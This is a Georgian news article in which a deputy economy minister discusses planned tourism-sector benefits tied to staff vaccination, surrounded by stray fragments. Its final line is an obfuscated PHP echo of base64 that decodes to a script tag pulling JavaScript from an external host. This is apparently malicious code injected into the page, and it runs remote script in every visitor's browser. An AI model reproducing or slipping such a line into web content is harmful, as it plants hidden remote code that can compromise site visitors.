celsiusi
ავერსი შნაიდერი
ეკონომიკის სამინისტრო პრემიერ-მინისტრის დავალებით, ტურიზმის სექტორისთვის დამატებითი შეღავათების დაწესებაზე მსჯელობს. ამის შესახებ ეკონომიკის მინისტრის მოადგილე მარიამ ქვრივიშვილმა განაცხადა.
 
„ეკონომიკის სამინისტრო, ტურიზმის ეროვნული ადმინისტრაცია პრემიერ-მინისტრის დავალებით ვმუშაობთ შეღავათებზე, რომ მოხდეს ერთი მხრივ, სტიმულირება და მეორე მხრივ, სტიმულირება ისე, რომ მაქსიმალურად დაზღვეული იყოს ყველა ვირუსის გავრცელებისგან.
 
სხვადასხვა ფორმებზე ვმსჯელობთ, ალბათ კვირის ბოლომდე დაგვჭირდება მსჯელობისთვის დრო და ვფიქრობთ, ამის შემდეგ კერძო სექტორს გავუზიარებთ ინფორმაცია, რომ თუკი რამე იქნება კერძო სექტორის სასტიმულირებლად, საჭირო იქნება თქვენი უკუკავშირი, იმისთვის, რომ მერე საკოორდინაციო საბჭოს ეს წარვუდგინოთ“, - განაცხადა ქვრივიშვილმა.
 
მისი განმარტებით, სავარაუდოდ შეღავათებით ისარგებლებენ ბიზნეს-სუბიექტები, რომელთა თანამშრომელთა უმრავლესობა ვაქცინირებული იქნება.
 
„შეღავათებს სიფრთხილით ვეკიდებით, რადგან არ მოხდეს რაიმე ფორმით რომელიმე ჩვენი მოქალაქის, ან ბიზნეს-სუბიექტის დისკრიმინირებულ ფორმაში მოხვედრა, რადგან სენსიტიური თემაა, თუმცა ვფიქრობთ, რომ თუკი ვაქცინაცია მეტი დაცვის შესაძლებლობაა, ვეძებთ ყველანაირ ფორმას, რომ ყველა პასუხისმგებლიანი ბიზნესი და ჩვენი ქვეყნის ყველა მოქალაქე იყოს შედარებით უფრო სამართლიანი, მაგრამ განსხვავებული ფორმებით შეეძლოს ბიზნესს ოპერირება. ხოლო რყევები, რომელიც ჩვენგან დამოუკიდებელი მიზეზებით ხდება, ბიზნესზე არ აისახოს“, - განაცხადა მარიამ ქვრივიშვილმა.
1291
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");